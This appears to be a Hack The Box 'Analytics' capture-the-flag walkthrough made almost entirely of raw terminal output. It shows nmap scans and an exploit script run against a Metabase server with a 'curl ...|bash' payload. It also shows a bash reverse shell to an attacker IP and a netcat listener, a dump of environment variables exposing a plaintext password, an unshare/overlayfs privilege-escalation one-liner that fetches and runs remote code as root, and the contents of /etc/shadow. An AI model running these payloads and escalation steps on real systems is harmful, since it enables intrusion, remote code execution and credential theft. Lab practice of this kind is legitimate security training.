HTB-Analytics（Easy）

┌──(kali㉿kali)-[~/Desktop/htb/Analytics]└─$ sudo nmap --min-rate 10000  10.10.11.233 [sudo] password for kali: Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-08 09:46 EDTNmap scan report for 10.10.11.233Host is up (0.34s latency).Not shown: 696 filtered tcp ports (no-response), 302 closed tcp ports (reset)PORT   STATE SERVICE22/tcp open  ssh80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 3.44 seconds                                                                                                                                                                   ┌──(kali㉿kali)-[~/Desktop/htb/Analytics]└─$ sudo nmap -sT -sV -O -p11,80 10.10.11.233Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-08 09:51 EDT
                                                                                                                                                                   ┌──(kali㉿kali)-[~/Desktop/htb/Analytics]└─$ sudo nmap -sT -sV -O -p22,80 10.10.11.233Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-08 09:51 EDTNmap scan report for 10.10.11.233Host is up (0.34s latency).
PORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)80/tcp open  http    nginx 1.18.0 (Ubuntu)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 5.0 - 5.3 (95%), Linux 4.15 - 5.6 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 3.1 - 3.2 (92%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 19.70 seconds

python3 single.py -u http://data.analytical.htb -c 'curl 10.10.14.44:8000/rev|bash'

#!/bin/bashbash -i >& /dev/tcp/10.10.14.44/9001 0>&1

┌──(kali㉿kali)-[~/Desktop/htb/Analytics]└─$ sudo nc -nlvp 9001listening on [any] 9001 ...connect to [10.10.14.44] from (UNKNOWN) [10.10.11.233] 49914bash: cannot set terminal process group (1): Not a ttybash: no job control in this shellde17e0ef4ebb:/$ ididuid=2000(metabase) gid=2000(metabase) groups=2000(metabase),2000(metabase)de17e0ef4ebb:/$ envenvSHELL=/bin/shMB_DB_PASS=HOSTNAME=de17e0ef4ebbLANGUAGE=en_US:enMB_JETTY_HOST=0.0.0.0JAVA_HOME=/opt/java/openjdkMB_DB_FILE=//metabase.db/metabase.dbPWD=/LOGNAME=metabaseMB_EMAIL_SMTP_USERNAME=HOME=/home/metabaseLANG=en_US.UTF-8META_USER=metalyticsMETA_PASS=An4lytics_ds20223#MB_EMAIL_SMTP_PASSWORD=USER=metabaseSHLVL=5MB_DB_USER=FC_LANG=en-USLD_LIBRARY_PATH=/opt/java/openjdk/lib/server:/opt/java/openjdk/lib:/opt/java/openjdk/../libLC_CTYPE=en_US.UTF-8MB_LDAP_BIND_DN=LC_ALL=en_US.UTF-8MB_LDAP_PASSWORD=PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binMB_DB_CONNECTION_URI=JAVA_VERSION=jdk-11.0.19+7_=/usr/bin/envde17e0ef4ebb:/$ ls -la /ls -la /total 96drwxr-xr-x    1 root     root          4096 Oct  8 08:52 .drwxr-xr-x    1 root     root          4096 Oct  8 08:52 ..-rwxr-xr-x    1 root     root             0 Oct  8 08:52 .dockerenvdrwxr-xr-x    1 root     root          4096 Jun 29 20:40 appdrwxr-xr-x    1 root     root          4096 Jun 29 20:39 bindrwxr-xr-x    5 root     root           340 Oct  8 08:52 devdrwxr-xr-x    1 root     root          4096 Oct  8 08:52 etcdrwxr-xr-x    1 root     root          4096 Aug  3 12:16 homedrwxr-xr-x    1 root     root          4096 Jun 14 15:03 libdrwxr-xr-x    5 root     root          4096 Jun 14 15:03 mediadrwxr-xr-x    1 metabase metabase      4096 Aug  3 12:17 metabase.dbdrwxr-xr-x    2 root     root          4096 Jun 14 15:03 mntdrwxr-xr-x    1 root     root          4096 Jun 15 05:12 optdrwxrwxrwx    1 root     root          4096 Aug  7 11:10 pluginsdr-xr-xr-x  354 root     root             0 Oct  8 08:52 procdrwx------    1 root     root          4096 Aug  3 12:26 rootdrwxr-xr-x    2 root     root          4096 Jun 14 15:03 rundrwxr-xr-x    2 root     root          4096 Jun 14 15:03 sbindrwxr-xr-x    2 root     root          4096 Jun 14 15:03 srvdr-xr-xr-x   13 root     root             0 Oct  8 08:52 sysdrwxrwxrwt    1 root     root          4096 Oct  8 09:23 tmpdrwxr-xr-x    1 root     root          4096 Jun 29 20:39 usrdrwxr-xr-x    1 root     root          4096 Jun 14 15:03 varde17e0ef4ebb:/$

metalytics@analytics:~$ uname -aLinux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linuxmetalytics@analytics:~$ unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'mkdir: cannot create directory ‘l’: File existsmkdir: cannot create directory ‘u’: File existsmkdir: cannot create directory ‘w’: File existsmkdir: cannot create directory ‘m’: File existsuid=0(root) gid=1000(metalytics) groups=1000(metalytics)metalytics@analytics:~$ unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("curl 10.10.14.44:8000/rev|bash")'mkdir: cannot create directory ‘l’: File existsmkdir: cannot create directory ‘u’: File existsmkdir: cannot create directory ‘w’: File existsmkdir: cannot create directory ‘m’: File exists  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                 Dload  Upload   Total   Spent    Left  Speed100    54  100    54    0     0    107      0 --:--:-- --:--:-- --:--:--   108

root@analytics:~# cat /etc/shadowcat /etc/shadowroot:$y$j9T$aVUkVU8LWFNEuXdwrOIJH.$jF8hy0vMzBJTvu/.HkzP0E4ZObo1I.frOPRVj2ktqM2:19576:0:99999:7:::